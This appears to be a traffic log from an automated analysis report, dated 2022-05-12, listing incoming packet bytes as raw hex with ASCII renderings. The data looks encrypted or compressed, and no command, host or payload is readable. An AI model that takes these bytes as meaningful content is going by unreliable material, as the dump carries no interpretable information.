                                                                                                                                  2022-05-12 17:41:27 UTC20INData Raw: ed cb 0c e6 c8 42 e5 0d 21 89 1b 7e ac 43 f9 50 8a 32 18 af 82 77 8c 5c c1 00 fe 85 37 0c 0e d2 d5 b0 44 48 dc 05 f4 10 4c 44 42 b0 58 d5 cc 8c 84 e3 fa b6 eb a2 35 52 cf 05 14 98 29 99 28 4c 9f de 54 26 86 84 7a a6 75 35 5e db 00 bc 3e b3 20 f2 44 2f eb 06 01 34 68 6c 6c 9f 2f 0c 5f 99 23 1d 0c be b6 31 a7 c5 e8 51 02 13 39 bd da 6e 58 ea 9d 50 44 c7 3d b4 2d 1f 9d 48 e0 fd a7 2a 26 46 d7 51 e8 75 f8 62 cd 8d 81 e3 22 8a 5e c8 8d 13 2b b8 d6 4f b3 a7 af 29 68 18 b0 5a ab 5b cf e8 99 50 b0 e4 88 0d c9 b6 2f 93 b0 28 bd 32 67 29 51 42 9c 58 e2 55 66 aa b4 af b4 d5 c7 b8 64 b5 c3 69 9a 22 6a a6 66 a5 4c 2e 6c 86 ad 0f f9 b4 d2 29 ee 45 79 ce 94 30 b9 45 8f b3 74 86 c0 f9 8a 66 f3 1b 5c 06 3b 9c 70 0c 86 5a b7 c4 e8 c7 cb 69 ab d9 77 2a 7f 9b c9 01 be 11 58
                                                                                                                                  Data Ascii: B!~CP2w\7DHLDBX5R)(LT&zu5^> D/4hll/_#1Q9nXPD=-H*&FQub"^+O)hZ[P/(2g)QBXUfdi"jfL.l)Ey0Etf\;pZiw*X
                                                                                                                                  2022-05-12 17:41:27 UTC21INData Raw: d3 b9 ee b9 37 fe 33 a3 9c 01 4a 0f 69 67 33 a6 66 98 d0 21 72 1a 36 f8 35 48 2d 77 90 65 7c 17 06 72 dd 7f 38 e5 36 a4 e3 2b 79 fc 1e 71 85 bb 71 e3 af 34 9e 3b 80 d6 72 de 9d d4 d9 8c 9f 5c eb 7f 21 db 90 f6 d7 52 08 e0 7b 7f 3c 58 7b 45 2b 77 d1 6d a4 e5 1d 0a 37 ce f2 f0 0c 2d b8 34 ff 14 fe 1a 8c d4 ef e2 27 e3 d0 2b c8 72 46 33 a2 82 98 bf ac b2 ad 1f fc 3d 00 8d e5 ec 06 6a da 85 c8 df d2 0b 11 5b 05 ef 07 56 9d 39 08 3e 8f 18 2a 17 57 67 93 bc e4 a4 94 8d 39 20 f2 2e fe fe 30 3d 8c 4a dd b5 b0 77 b3 6a 34 0a e4 e3 3b af 9c 1c c7 70 d6 92 39 06 7a 6a 4a 7e 22 79 00 5c d2 fd 93 7b e1 d7 8e f6 f3 23 d9 dc 1a ae 4d b1 07 e0 b8 c4 6a 05 41 23 35 02 18 ef 99 1d 3c 67 ce 2b 53 ad 80 58 ac 2a f6 63 16 74 f1 49 87 c6 9d 80 60 e0 71 4d d5 8c d6 14 62 04 1e
                                                                                                                                  Data Ascii: 73Jig3f!r65H-we|r86+yqq4;r\!R{<X{E+wm7-4'+rF3=j[V9>*Wg9 .0=Jwj4;p9zjJ~"y\{#MjA#5<g+SX*ctI`qMb
                                                                                                                                  2022-05-12 17:41:27 UTC23INData Raw: 3e 61 35 46 45 8d 4d fe b2 99 87 83 ac df dc dc ab 69 cb f5 6e 87 d8 63 10 79 84 45 16 6d 8c bb ef eb 9f f8 24 fa 5e 70 21 91 06 4e 7c 84 b7 5f a7 c4 e0 9d 61 e2 0e 4d e2 c4 b1 5f 03 9d 7e b7 d4 ec da 1d 78 86 db 56 07 51 f6 36 f4 7b ca 4f 87 27 5d b5 e4 82 b6 3d 6b 9e 0a 0f db 1a 14 42 f5 6b 98 6f fa 6a 48 0f 9c a6 f5 93 d3 72 4a b3 fd 99 2a b4 69 c7 be 44 a4 e0 10 a0 f5 78 5a 18 6a 29 e8 94 26 fc b3 8e 08 d3 69 82 d3 e5 d3 cb 30 58 80 b9 77 f0 c1 7f 41 ee c3 bf 46 e4 d2 0f 8d d4 2a 9f b9 aa 7d 06 b4 53 da 0e 08 70 ef 1e 2c 0b 0c d4 b6 11 df 3d bc be 26 06 69 64 43 09 d7 49 08 80 69 e7 37 47 ab 7d a8 d3 b4 15 23 76 e9 c1 2a f8 19 2f 0b 6c f6 de b1 a7 71 0f e8 45 6e 7e e7 ea cb c9 25 5c 35 28 b9 cf 4d ba 5d 74 00 08 73 16 70 12 79 16 c0 c1 88 4d 6a 4f cd
                                                                                                                                  Data Ascii: >a5FEMincyEm$^p!N|_aM_~xVQ6{O']=kBkojHrJ*iDxZj)&i0XwAF*}Sp,=&idCIi7G}#v*/lqEn~%\5(M]tspyMjO
                                                                                                                                  2022-05-12 17:41:27 UTC24INData Raw: fa 37 af 96 1c b3 bd ce c0 3a 04 79 46 44 60 20 73 19 7a fd fd 9b 6d 9f df a2 ff f0 fc 19 ac 1a ae 49 b3 71 d3 a9 a3 9d 04 6d 23 36 ff 00 e3 9f 3d 08 99 cf 0d d1 bc 8c 58 a0 e8 6b 9f 17 58 d2 54 87 bc 84 fe 6d e3 59 6d fc ad de 17 4c 09 3c 90 f2 48 ff 34 64 ba ea f9 2a c0 5b d3 bb 1c 2a 11 df f2 a9 c4 07 1b 0e 94 de c0 6c 69 37 0e e1 7d fc 19 4c 0a a8 df 7d 99 1f d6 b2 fe 8c 21 89 1f 6d 2c 50 7f 80 24 1c 9c f4 81 84 30 16 1a ae 70 0b ca d2 3c 84 f2 de 72 29 84 52 bc ae d1 52 cd 45 54 7a 12 be 62 3e ff ed a9 1b 17 1a de dc a1 a4 b7 f1 2d d7 0d 19 b6 bd 46 5c 22 c1 a0 88 eb d9 54 e7 8e 25 47 19 21 39 9a 34 96 53 0c 83 20 51 22 92 ae 78 87 db 56 b6 f2 f4 a4 3c 8e 94 ec 78 d1 ea 39 33 20 64 ca 64 80 21 c2 5e b5 30 20 1a 82 33 40 58 3a c2 4f 11 78 49 43 db 44
                                                                                                                                  Data Ascii: 7:yFD` szmIqm#6=XkXTmYmL<H4d*[*li7}L}!m,P$0p<r)RRETzb>-F\"T%G!94S Q"xV<x93 dd!^0 3@X:OxICD
                                                                                                                                  2022-05-12 17:41:27 UTC25INData Raw: 18 2c 06 0f d1 90 0a 05 16 b0 ed 37 06 68 76 32 18 d7 49 0a 93 20 b9 32 28 8b 7d a8 d6 2b 4a 78 76 c5 c7 35 f1 04 28 0b 6c f3 c2 94 60 71 23 e9 51 7f 91 0f e1 cc cd 12 6b 27 2f b3 c8 d0 af 89 98 29 09 65 1e 5a 3b 82 17 c0 ef 92 64 44 45 e5 e4 79 4a 20 a9 ac a4 27 df 8f 62 e2 7a ef 0c ee bb ba c5 d8 e5 8b 44 42 e8 90 07 8c dc 6d 43 8b 75 83 43 2d 26 13 01 3b ad 80 4c 93 e5 cc b9 80 27 03 94 3c 32 8f 6a 01 d4 d2 56 c6 4b e0 3d cb 8a f7 cd 39 de 23 80 b4 18 27 63 6f 4f 1a a1 71 fd 3d 28 72 10 35 3a 64 24 43 77 92 70 0f 0c f9 0e d4 79 57 91 1e be eb 2c 01 d2 3d 71 81 de 9e ea af 3e 9d 89 b0 d5 72 d4 93 c3 d8 20 86 22 e3 10 1b de b8 e7 fd b5 0c c8 5e 69 14 62 fb 4c 21 61 e6 97 8b 89 6b 0a 35 db 89 ca 66 24 b1 34 f5 03 d2 17 8a bb 91 ca 04 e9 c3 24 59 7e 4c ed
                                                                                                                                  Data Ascii: ,7hv2I 2(}+Jxv5(l`q#Qk'/)eZ;dDEyJ 'bzDBmCuC-&;L'<2jVK=9#'coOq=(r5:d$CwpyW,=q>r "^ibL!ak5f$4$Y~L
                                                                                                                                  2022-05-12 17:41:27 UTC27INData Raw: d4 33 d5 01 f1 01 d5 37 39 00 43 b9 49 03 87 a1 80 fe fc fb fa af 3c 4d 26 fa 39 b6 3c 8c 25 45 8a 3c ab 0b a8 a9 7e 85 78 18 54 00 0b b2 2f 7c 95 c8 6a 39 e7 0f 3c 37 61 d2 92 9e 03 34 77 d2 33 0b 15 b0 97 b3 a7 cc f2 af 12 3b 21 68 c1 59 50 fd be 5b a9 c2 11 a7 3e 0b 63 40 d1 0c b0 78 03 6d d5 7e f5 ca f8 6e cc 89 9d 7e 91 b8 df d8 b0 f6 1a 96 d5 0d a0 a3 af 7b 6c 00 5f 73 9f 49 b1 cd f6 52 b5 cc 7e 06 e1 a4 41 91 bb 47 68 38 7e 30 5f 45 a5 82 f9 ab 6d 8a a7 ba dd c6 d5 bd 45 d0 f5 6f 8b 23 f8 31 79 e2 a3 2e 6c 86 bd df fe 91 97 75 fd 41 73 ce 95 3d 91 57 a6 a7 5a b6 dd 64 39 54 3f c1 45 dd 12 9d 73 1b 9f 4d b3 fd c2 da 35 62 59 db 76 2f 47 f6 26 fe 41 19 4f 87 27 0c ec e3 8d ba 3a 70 61 10 13 c6 12 43 46 f4 6b dc 47 ea 7a 36 12 b4 b0 f0 bf b6 35 d3 b3
                                                                                                                                  Data Ascii: 379CI<M&9<%E<~xT/|j9<7a4w3;!hYP[>c@xm~n~{l_sIR~AGh8~0_EmEo#1y.luAs=WZd9T?EsM5bYv/G&AO':paCFkGz65
                                                                                                                                  2022-05-12 17:41:27 UTC28INData Raw: 13 0c dc 66 c6 e0 32 b4 e2 03 9e d4 3d 7b a9 9b eb e6 af 3c 84 18 c4 f9 78 d9 87 b6 fe bf 86 26 fd 76 2d df b0 f0 2b 53 22 c1 5f 7d 41 1c fb 4c 2f 69 d9 b0 8b fa e3 0b 19 d8 83 c0 68 1c b1 34 fb 0d da 06 86 c3 17 cb 28 e1 c8 2d 48 73 5c cd a7 73 9c bb d2 80 af 00 81 73 56 f3 ec e8 1d 62 f2 90 d2 21 d5 0f 3a 28 80 e5 87 59 96 20 00 e3 6c 0c d4 16 79 7a fc 83 fd d2 82 87 c7 25 f6 32 d7 fb 0e 48 50 b5 22 b8 1a 6d 83 69 30 76 29 e1 3b e6 9e 03 af 55 dc e8 08 94 7a 6e 62 61 31 7d 1a 8a f0 d1 9f 73 78 d8 fd ca f6 fe 7c d2 07 bd 4b ae 6c d7 bb 44 62 29 44 0c f7 39 09 eb 9f 24 1b 7f 30 20 ff a3 83 4f 9b e9 7e 72 12 74 e2 52 e2 0b 85 d2 62 e9 73 34 b0 ad d4 10 7b 25 2e 94 f8 5a d3 0c 9b bb cc d4 54 ca 47 c6 99 03 36 19 c8 04 b7 e3 fa 02 31 95 f5 4e 77 7c c5 0f c5
                                                                                                                                  Data Ascii: f2={<x&v-+S"_}AL/ih4(-Hs\ssVb!:(Y lyz%2HP"mi0v);Uznba1}sx|KlDb)D9$0 O~rtRbs4{%.ZTG61Nw|
                                                                                                                                  2022-05-12 17:41:27 UTC29INData Raw: f7 96 1d 97 a8 fd 41 7f c0 80 39 42 44 b2 b3 47 59 da c6 82 64 99 4d 4a f8 3e a7 5d 26 8c 4d b2 d5 fd df 2c 96 86 f7 4c 2d 3c b9 36 fe 45 76 10 86 27 4c 1e e9 98 b4 3f 70 71 0e 3c d2 ec 35 6a e4 69 9f 29 6f 6d 26 80 db 2d f4 93 df 54 d9 a0 f8 99 27 a2 71 d5 51 42 97 e4 ec da 97 61 52 3c 56 50 e8 94 0e f3 a1 9d 07 fb 6e 86 ce 11 eb 22 24 4e 82 dd 37 e3 c6 7b 3f 83 dc 41 4d df 3f 15 8c df b8 9d bc aa 6e 6c bc ac db 28 3d 67 95 50 26 2e 25 d3 eb 50 db 16 b2 d1 35 7d 39 66 32 1c 59 fe 65 e7 6c f5 38 21 85 78 a8 c6 35 65 6e 88 e8 eb 3a f3 71 66 0b 7d f5 ae 22 59 70 29 fc 42 7b 42 95 fb ce df c4 53 0a 2c ae cd 4f a5 46 8f 1e 33 9b 1f 7c 11 53 13 f8 05 65 b3 95 6f e5 ee a7 59 16 86 ad b1 25 df 8f 32 e2 7a e6 16 95 f9 a7 c5 dc c9 9b 5c b1 ea 51 01 ff 80 53 43 81
                                                                                                                                  Data Ascii: A9BDGYdMJ>]&M,L-<6Ev'L?pq<5ji)om&-T'qQBaR<VPn"$N7{?AM?nl(=gP&.%P5}9f2Yel8!x5en:qf}"Yp)B{BS,OF3|SeoY%2z\QSC
                                                                                                                                  2022-05-12 17:41:27 UTC30INData Raw: bf 3c 17 7d d3 ab b6 61 06 49 48 88 22 1a e9 b3 39 1b 6f a1 69 d3 a4 8a 09 bf fc b9 70 12 60 a2 40 f7 2b 8e f6 45 e6 79 26 a0 ad d4 1e b8 2b 17 90 f9 5b d7 17 67 ba e6 d1 50 e3 5b df 9d 03 27 1d c4 ca b3 cf ff 1b 22 91 a1 5f 73 74 39 5e 92 28 02 18 64 77 0f e6 2a 67 cd 22 86 08 8d 29 97 92 30 01 7b 76 d2 02 4d f3 6d a1 8c 35 1c 32 82 34 0d c0 df 14 bd 0c 21 87 78 72 d3 71 f3 2e a7 1a 92 ab 85 eb f0 99 c7 6f 82 a8 1b 1d 10 d4 f7 95 a8 4f d8 76 de 35 5c 5a 47 ba 52 2e a2 d8 81 f4 da 87 cf a0 6c 55 34 0c 57 0e 3e 94 2e 69 9e 31 51 1b 81 d4 21 8d e2 36 41 1c 0e c0 6c 82 94 e0 7f 2a 90 71 31 37 6c a5 e2 9f 2f 3a 4d 9f 1a 72 1e ba 84 93 1c 1b e6 43 15 e9 33 53 db 42 46 92 ea 4d 57 c9 e1 a7 79 69 f1 49 cc f4 a0 50 6e d4 d7 55 60 c0 bf c3 8d 81 9b f4 0e cb 4f cc
                                                                                                                                  Data Ascii: <}aIH"9oip`@+Ey&+[gP['"_st9^(dw*g")0{vMm524!xrq.oOv5\ZGR.lU4W>.i1Q!6Al*q17l/:MrC3SBFMWyiIPnU`O
                                                                                                                                  2022-05-12 17:41:27 UTC32INData Raw: 5e 92 c6 35 fb 1c 30 64 09 f1 c1 b6 46 60 30 e5 54 79 41 8a f9 35 c8 16 70 24 54 f7 de 4a a1 55 89 7a 7f 65 1e 54 7c e4 16 c0 ef b0 30 6b 45 ef f8 bd 25 52 83 ad be 38 cb 9c 64 e2 6b f1 0b f3 57 a6 e9 cc e6 eb 3a 41 e8 55 0e 9a d5 dc f4 e4 10 fd 62 27 39 09 3a 5a ad 91 40 fc 27 cd 95 88 52 51 bc 55 36 83 7c 7d b8 d2 47 ca 53 fa ac a1 a6 f0 d1 2d fa 2c a9 a7 1e 48 1e 69 50 05 58 67 be 4a 2a 09 54 32 25 52 42 a3 c0 24 52 73 25 1f 06 c2 67 57 95 1e be eb 34 69 c7 3b 71 94 b7 ee e0 51 35 b6 ea c6 ae 17 de 9f cf 80 7a 99 29 f1 79 21 ce be f2 c5 ac 0f e4 7a 7d 47 1c fb 4c 2f 75 d6 cb e2 e6 1d 0e 5a 4e 84 c3 13 7b cd 35 ff 1a c0 1c e1 a0 e9 ca 0e fc c1 32 4e 7b 57 35 b9 47 6f bd 80 a5 ad 7b c5 0e 19 f7 fa c4 7d 6f f2 92 dc c7 bb 57 32 5b 0f fa 9e 4c 9b 39 1d e5
                                                                                                                                  Data Ascii: ^50dF`0TyA5p$TJUzeT|0kE%R8dkW:AUb'9:Z@'RQU6|}GS-,HiPXgJ*T2%RB$Rs%gW4i;qQ5z)y!z}GL/uZN{52N{W5Go{}oW2[L9
                                                                                                                                  2022-05-12 17:41:27 UTC33INData Raw: 87 4f 3f 0b 84 a5 12 8f 99 63 49 0d 0f 6d 1e ff 95 e4 64 39 f5 7a 45 37 68 c0 73 94 3c 38 5f 88 36 1c e1 bb a2 bd bf d6 ec 51 02 13 3a 4f 25 43 71 ea b5 36 19 c3 3d a1 2a 2e 1e 48 cc f8 a7 4a 6e 32 d7 55 6c dd e2 ab c4 81 8a f4 3c 74 4e e0 b0 ef 51 da d5 57 a4 b9 22 17 6c 00 4f 56 8e 5e ae 97 05 59 a3 d3 3f 91 c0 a4 5c 0d b8 31 ab a4 77 2c 4f 2d f9 5c f9 a1 7c 95 ab a9 ca d4 d9 a9 90 ca c8 7e 98 5d 2c 3c 70 89 6b 06 10 8d bb fb ee 82 97 41 fd 41 73 c0 82 39 43 44 b2 b2 47 59 da c6 81 64 99 51 4a f8 3e df 0c 1a 95 54 bd cc ff de 35 79 83 c4 4f d1 46 db 3c d6 10 19 4f 8d 2b 59 b2 f0 86 a7 2b 74 7e f5 22 ef 05 36 3d ba 6b 98 43 fc 43 34 04 b4 ba e2 89 b6 3f cb b3 f7 86 3f b4 6a c7 be 47 a4 ff 10 a0 f5 68 6a 6d 6e 28 e8 8b 1b ff b6 8e 13 ff 60 8c 2d ee c6 19
                                                                                                                                  Data Ascii: O?cImd9zE7hs<8_6Q:O%Cq6=*.HJn2Ul<tNQW"lOV^Y?\1w,O-\|~],<pkAAs9CDGYdQJ>T5yOF<O+Y+t~"6=kCC4??jGhjmn(`-
                                                                                                                                  2022-05-12 17:41:27 UTC34INData Raw: 7a be 06 93 2b 91 9c 8d 33 1c 11 e8 39 1e c2 d2 2d c0 12 33 73 75 57 a7 52 f5 39 7a 21 1e b4 96 fe eb 9d d0 08 e3 57 1a 3b 00 ca cf a1 ba 58 f8 1e fe cb 57 65 52 bb 38 65 cd a0 84 fd bf 2a e7 a2 36 5b 13 17 30 9a 2f 9c 37 5b 7d 21 79 1d 87 ff 03 d1 e2 32 4d 0e 5b c0 6d 82 94 e0 50 82 e9 15 31 28 77 d9 64 9f 3e 34 40 81 cc 0a 33 ae 8d ee a4 95 93 31 13 17 21 56 ba 3f 3d fd b7 49 48 da 2e ad 29 17 6b 57 32 f3 9d 5d 39 fd d6 55 66 dd e6 ab c8 81 8a f8 39 87 b1 cd b6 e5 2d 82 e4 5a bf ad bc 30 6c 11 46 44 93 b6 b0 eb 94 57 b2 42 c3 36 81 43 bf 6e ae 3d a4 30 7e 2b 5d 5d ad a2 f8 87 77 84 d4 e7 db d0 c2 b1 01 b5 e5 69 90 39 43 2f 78 8d 6d 26 70 72 ba dd e8 9b a8 4e a4 41 79 db 86 6a bc ba 5c 49 42 b4 d3 ea 9f 6e fd 00 b4 f9 16 bc 70 4b 83 23 ee d5 ec de 2a 48
                                                                                                                                  Data Ascii: z+39-3suWR9z!W;XWeR8e*6[0/7[}!y2M[mP1(wd>4@31!V?=IH.)kW2]9Uf9-Z0lFDWB6Cn=0~+]]wi9C/xm&prNAyj\IBnpK#*H
                                                                                                                                  2022-05-12 17:41:27 UTC35INData Raw: 32 8b 48 13 bf d2 5c ca 53 e3 3d 52 8a f7 cd 21 f7 3f a7 bc 03 b6 0e 43 40 07 8e 1d 93 50 22 74 04 5d d7 56 4b 27 6b 9e 7a 00 3b 10 f2 d5 53 23 e2 62 dd e1 2b 7b fc b5 70 85 bb d9 97 ae 34 90 e0 da ed 1d 2c 9f cb a6 a0 96 2e e2 77 3d 21 b9 c1 c4 4d 16 e0 23 7e 3c 58 fd 53 21 18 27 b0 83 ec 00 06 35 d9 9b c9 eb 52 9d 26 e0 1a fe 7d 8f d4 e3 cc 1b c7 bf d3 48 7b 4c 2c ad 53 91 b4 b5 4c ae 2c 84 19 31 88 ed ec 0c 68 e4 f7 38 df d4 29 28 57 05 ed 98 4f 63 38 20 f8 67 66 48 17 55 7c c3 07 fc da 97 a5 44 25 da 3a fa e1 76 7a 5d 4a dd b5 2f 6f bf 6a 38 c0 d7 e0 17 ad 86 0f be 4b d0 e0 ce 07 56 7f 75 49 5b 78 06 7e f7 e2 bf 1e 93 de 8e fc e8 f3 7a de 12 b1 46 50 7c ff b7 b9 18 58 41 27 19 0a 67 ee 9f 3f 19 78 d2 4e 21 a4 80 52 b7 fd 6b 61 1e 6b f8 a8 fd d9 96 e1
                                                                                                                                  Data Ascii: 2H\S=R!?C@P"t]VK'kz;S#b+{p4,.w=!M#~<XS!'5R&}H{L,SL,1h8)(WOc8 gfHU|D%:vz]J/oj8KVuI[x~zFP|XA'g?xN!Rkak
                                                                                                                                  2022-05-12 17:41:27 UTC36INData Raw: b4 cb 68 f3 c8 90 5a 93 ca 66 b7 38 7a 39 2e 22 8d 5c fd 83 1b 87 af a3 cd ca a9 cc 6e cb ee 74 91 26 65 2a 8e 8c 50 2c 7b 87 bb f6 e7 92 06 34 d1 43 52 da a8 cd b9 bb 5c 9c 5f a7 db f9 be 62 e2 92 4a f8 3a ef 73 1b 84 48 a4 d1 d4 b5 35 68 87 db 4d 2b 5e 09 37 d2 4d 1f 50 bd 48 cd a7 e3 88 ab 20 63 64 0b 32 c7 09 ca 47 d8 65 9e 51 e2 7c 9e 6a d0 b1 f4 99 d3 57 d8 b7 fd 88 32 bf 90 c6 83 4d b8 f4 b2 be f6 0e de 39 6f 22 e2 8d 1d e8 b2 9f 06 ec 81 82 ff ec f2 1d 34 58 91 a2 61 1d c7 53 57 e1 cb 73 5d d3 f6 02 88 c2 a2 98 47 ab 53 6a b7 41 de 04 31 61 f2 e0 27 02 23 fa 92 2b 54 10 a1 4a 6d 06 69 67 3f 11 c1 56 25 0e 65 9a bf 3d 96 77 82 d7 30 7a 60 46 ed c7 ed f0 0a 28 6b 7d f1 d0 be 22 3e 23 e3 50 07 38 94 ea c1 d6 2c 38 09 2d af f4 48 de 19 8a 01 20 7a f1
                                                                                                                                  Data Ascii: hZf8z9."\nt&e*P,{4CR\_bJ:sH5hM+^7MPH cd2GeQ|jW2M9o"4XaSWs]GSjA1a'#+TJmig?V%e=w0z`F(k}">#P8,8-H z
                                                                                                                                  2022-05-12 17:41:27 UTC37INData Raw: 51 4b f1 ab 32 05 01 6a 30 d3 57 f0 3a af 94 2b a4 42 cf e6 3a 1f 69 6a 62 70 24 63 f8 75 dd f3 91 0a d3 de 8e f2 df 68 77 de 10 b5 5c aa 7d c2 a5 a5 6e fb 40 0b 12 20 61 57 9f 35 1b 4f 58 20 d3 ae 9f 56 bb f3 67 70 12 6b ff a8 fd d9 8e f7 50 93 71 49 fd b2 d9 07 60 2c 2c 94 e4 b5 d6 3b 63 bd cc da 50 d3 5f d5 8c 07 39 e3 de d6 a3 cd 82 ae 22 91 f1 21 62 64 3b 04 c1 7c 03 18 6a 0e b0 ef 39 62 e0 38 aa e5 72 28 bd e2 74 13 7f 7c b9 04 02 97 00 a0 a0 26 14 61 4f 35 0d ce ac 2d c9 0d 2b a5 6e 7a ad 49 fe 31 a1 21 1c ab 94 e9 f5 63 c0 2c f7 be 08 13 03 c3 d8 b6 b4 b7 f1 2d dd 1e 53 71 8b 47 bc d4 e7 26 82 0a c5 80 e6 a2 3e 46 32 79 f8 9a 3e 90 2a 3b 92 21 55 00 f9 6e 78 8d e6 30 5f 70 c9 bb 36 86 be e4 6e 3c db 16 31 79 68 ca 6c 93 2f 3c 4e 87 bf 13 1f ba 8f
                                                                                                                                  Data Ascii: QK2j0W:+B:ijbp$cuhw\}n@ aW5OX VgpkPqI`,,;cP_9"!bd;|j9b8r(t|&aO5-+nzI1!c,-SqG&>F2y>*;!Unx0_p6n<1yhl/<N
                                                                                                                                  2022-05-12 17:41:27 UTC39INData Raw: b9 aa 7f 61 b9 c3 cd 2a 34 6d f7 8f 3f 00 2f d9 89 91 c1 38 be e7 32 06 69 e6 38 c6 b0 41 13 02 67 f2 25 0f 9b 74 b7 dd 1e 57 5b 73 e9 c7 b5 fb d4 7a 0c 67 c2 cc b5 46 66 0d ff 74 6d 47 95 6a c1 17 7b 5a 3c be aa db 43 b8 46 8f d7 0a 6d 3e 55 13 78 96 ca 37 b5 5a 60 9b cc cb 8f 67 26 83 a7 a7 21 ce 89 4a 2c 7a f7 12 e4 81 89 c5 d8 ee 4e 66 69 c5 51 07 86 fc 53 43 8b e4 f7 4a 03 26 17 23 82 ad 86 6c e7 d9 cc f8 b5 2c 04 bc 55 32 8f 60 6e be d2 f0 cd 4c f7 f4 a1 8a f7 d0 3e fe 33 16 b4 18 49 0f 6f 4f 10 a6 66 92 50 8e 73 1a 32 98 57 4b 2d 65 92 7a 08 39 1f 0c d5 6c 08 e2 1e 50 e1 2b 7f bc 3d 71 94 a7 fc d2 4f 34 9a e6 c5 dc 6d d4 61 ca 80 b7 be b0 e2 7f 21 c0 b3 e0 d5 5b 17 36 59 53 38 48 f1 56 26 77 dc af 8e 18 1c 26 32 d9 9c d5 89 4c bf 39 ff 19 c1 f8 8f
                                                                                                                                  Data Ascii: a*4m?/82i8Ag%tW[szgFftmGj{Z<CFm>Ux7Z`g&!J,zNfiQSCJ&#l,U2`nL>3IoOfPs2WK-ez9lP+=qO4ma![6YS8HV&w&2L9
                                                                                                                                  2022-05-12 17:41:27 UTC40INData Raw: e8 cb 79 c1 00 f2 83 1b 17 10 e2 db a9 a4 49 f0 01 b0 35 56 58 40 ae ce 05 cd a0 82 fe d6 bc e5 a6 39 4a 35 77 d6 9a 3e 92 8a 43 8d 25 7d ee 84 af 7e a7 e2 32 5a 3d 08 bb 88 82 94 e4 6e 2f eb 15 33 1f 7f ca 6c 95 2d 2a 22 55 32 0b 1b b8 98 c3 6a c5 e8 55 11 14 58 88 db 42 59 ff b3 22 88 c3 3d a3 2b 75 97 49 cc f4 de b5 01 46 d1 57 4e 29 ef b8 c6 fc 51 f0 26 8e 4d b7 50 ed 2a 90 ab f3 a1 a3 a5 3a 03 de 4e 5b 81 3b 69 c7 99 5a db 69 75 0d c3 be 2f 4f b1 28 b1 2e 4d 21 57 40 f6 96 f9 ab 63 e9 09 a8 db da b2 cc 6e cb e5 06 3d 27 62 36 1f 52 7c 2e 6a 8e 93 02 fa 98 fe 37 92 9f 79 df 96 02 21 44 a3 bc 77 84 db ea 84 15 4a 1e 4a f2 47 79 73 1b 91 5c cc 1f ec da 31 76 e8 72 5d 2f 4d f5 4d 34 41 19 4b 85 02 b8 a1 06 82 a7 3c 03 ca 0a 23 c9 06 5b ed f5 6b 92 61 c0
                                                                                                                                  Data Ascii: yI5VX@9J5w>C%}~2Z=n/3l-*"U2jUXBY"=+uIFWN)Q&MP*:N[;iZiu/O(.M!W@cn='b6R|.j7y!DwJJGys\1vr]/MM4AK<#[ka
                                                                                                                                  2022-05-12 17:41:27 UTC41INData Raw: 0c 2d 28 cb 5a 3a 18 3d 7b 08 2e 70 57 d4 7f 32 f0 0a a9 37 38 6b c5 29 60 90 3f 46 d8 00 32 8c 89 75 d4 72 d4 88 46 f6 bf 86 23 f1 68 30 c8 ae f2 f5 cf 1f df 37 47 3d 52 f1 5f 2f 66 d1 3e 34 ff 33 19 37 f1 84 c3 15 d3 99 c0 fd 10 d0 2e 64 d4 e9 cc 22 f5 fa 30 4c 6d dc 3e a3 4e 95 a4 36 dd 1e 01 8b 04 31 d1 ee ec 00 46 d1 98 ca d5 85 2d 36 52 2d 1d 85 5f 9b 22 63 51 65 1a 20 45 41 74 e5 8b bb e3 10 8d 39 24 dc 5f 4f ff 36 1f bc 52 f6 dd 22 66 9b de 31 d7 23 f2 33 be 96 1c 84 2c 44 ed 30 0c 69 69 73 66 35 4a 10 76 d1 fd 93 71 e1 db de de 1d fe 76 d8 3c b8 5c ab a0 19 a3 ba 63 14 49 31 0c 25 75 e7 9e 35 15 08 7f 20 d3 ae 93 51 b9 fe 4f 98 14 74 f5 4d 93 47 85 fe 63 cc 62 58 f5 bc d3 03 b2 43 34 91 f8 41 b8 a6 64 ba ea dd 93 dc 49 cd b5 b6 26 1d d5 d7 23 12
                                                                                                                                  Data Ascii: -(Z:={.pW278k)`?F2urF#h07G=R_/f>437.d"0Lm>N61F-6R-_"cQe EAt9$_O6R"f1#3,D0iisf5Jvqv<\cI1%u5 QOtMGcbXC4AdI&#
                                                                                                                                  2022-05-12 17:41:27 UTC43INData Raw: ca 84 73 34 69 9b f0 7f 6c 8c ba 53 e9 90 e2 24 fa cd 28 df 90 2b e5 55 ab a5 56 b6 d2 fe 9a 7d 6f 4d 4a f8 3b a3 79 0a 9f 48 a0 49 fd d0 22 7f 1b ca 56 37 50 6b 27 f4 58 0f d3 96 2d 5c b1 7f 93 ad 2d 58 fc 0b 23 c9 34 25 4c e2 fb b4 4d fb 62 5e 9f 9c a1 f4 93 d3 40 da b9 ea 09 1a 84 7f ce b8 d9 93 fa ee a1 d3 b1 03 38 6f 29 c0 80 0e ec b8 a6 a2 fb 7f 89 aa be ea 0e 31 29 d1 a6 7b e2 cc 6e 5a f1 4d 6d 58 cc f4 0f 90 49 8e 9f b9 aa 75 b9 ac 52 da 1f 08 71 ee 1e 2c 06 81 d1 90 0a af 1a b6 c7 2c 57 78 6c 28 88 fb 6d 1b 9a 76 6f 1a 2d 96 7d a2 07 61 7a 7b 77 c1 d3 35 f1 00 00 ab 7d f1 cb c5 08 70 23 e2 25 39 47 95 eb d8 ce 2d 78 26 2f aa ee 49 a5 6f 8a 01 24 11 1e 50 02 6e 1d eb f2 98 4b 7d bb e4 c2 a5 52 2d 83 aa a2 d9 de a3 60 f5 71 f7 13 f6 57 a6 e9 da cf
                                                                                                                                  Data Ascii: s4ilS$(+UV}oMJ;yHI"V7Pk'X-\-X#4%LMb^@8o)1){nZMmXIuRq,,Wxl(mvo-}az{w5}p#%9G-x&/Io$PnK}R-`qW
